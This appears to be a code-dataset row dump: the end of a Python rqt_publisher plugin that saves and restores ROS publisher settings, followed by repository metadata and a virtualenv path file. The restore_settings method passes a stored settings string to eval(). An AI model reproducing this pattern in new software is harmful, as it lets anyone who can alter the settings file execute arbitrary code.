del self._publishers[publisher_id]
def save_settings(self, plugin_settings, instance_settings):
publisher_copies = []
for publisher in self._publishers.values():
publisher_copy = {}
publisher_copy.update(publisher)
publisher_copy['enabled'] = False
del publisher_copy['timer']
del publisher_copy['message_instance']
del publisher_copy['publisher']
publisher_copies.append(publisher_copy)
instance_settings.set_value('publishers', repr(publisher_copies))
def restore_settings(self, plugin_settings, instance_settings):
# If changing perspectives and rqt_publisher is already loaded, we need to clean up the
# previously existing publishers
self.clean_up_publishers()
publishers = eval(instance_settings.value('publishers', '[]'))
for publisher in publishers:
self._add_publisher(publisher)
def clean_up_publishers(self):
self._widget.publisher_tree_widget.model().clear()
for publisher_info in self._publishers.values():
publisher_info['timer'].stop()
self._node.destroy_publisher(publisher_info['publisher'])
self._publishers = {}
def shutdown_plugin(self):
self._widget.shutdown_plugin()
self.clean_up_publishers()
| [
"[email protected]"
] | |
49a7d67eecf924882e9f2aa4097d4b1d2d124264 | ec46c70a721f16031a784f54f522656fb43dfc9f | /venv/lib/python3.6/stat.py | 4d858099ad6d6f85e6e7bf6703e84af7a7511e3c | [] | no_license | kardelen-karatas/django-importXML | c6a62942b740697d3647ec0bc1ed9c078e751159 | b169966627bd54b684aaedd5fd6c0d7be551b973 | refs/heads/master | 2022-12-10T00:38:40.578278 | 2020-04-15T10:34:36 | 2020-04-15T10:34:36 | 125,032,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /home/kardelen/.pyenv/versions/3.6.3/lib/python3.6/stat.py | [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.